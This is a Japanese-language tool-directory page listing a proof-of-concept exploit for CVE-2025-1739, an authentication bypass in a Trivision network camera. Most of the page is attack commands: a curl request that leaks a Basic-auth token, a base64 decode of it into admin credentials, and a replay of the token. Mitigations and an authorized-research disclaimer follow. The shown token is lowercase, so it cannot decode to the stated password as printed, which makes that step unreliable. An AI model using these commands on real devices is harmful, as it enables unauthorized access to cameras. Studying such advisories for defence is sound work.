Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
ツール/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-1738 & CVE-2025-1739 — Trivision カメラ NC227WF PoC

📋 概要

CVECVSS v3.1スコアCWE種別
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Basic認証情報漏洩による認証バイパス

🔓 CVE-2025-1739 — Basic認証コードの露出 / 認証バイパス (CWE-288)

説明

このカメラは、mblogin.asp エンドポイントを介して有効なBase64エンコード済みBasic認証トークンを漏洩させます。このトークンは簡単にデコードして再利用でき、パスワードを知らなくてもデバイスへの不正アクセスが可能になります。

  • 攻撃ベクトル: 隣接ネットワーク (AV:A)
  • CVSSスコア: 7.1
  • CWE: CWE-288 (代替パスまたはチャネルを使用した認証バイパス)

ペイロード

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
画像

レスポンス例

レスポンスには有効なBasic認証トークンが含まれます:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

トークンのデコード

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

トークンの再利用

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ 緩和策

  • ファームウェアをアップグレードする(Trivisionからパッチ済みバージョンが提供されている場合)。
  • カメラを隔離する(外部アクセスのない専用VLANに配置する)。
  • 信頼できないネットワークセグメントからカメラの管理ポートをファイアウォールで遮断する。
  • デフォルトの認証情報を変更し、パスワードを定期的にローテーションする。
  • activex_pal.asp および mblogin.asp への予期しないアクセスを監視する。

⚖️ 免責事項

このリポジトリは、教育目的および許可を得たセキュリティ研究専用です。著者は不正使用について一切責任を負いません。デバイスをテストする前に必ず明示的な許可を取得してください。

ツールをダウンロード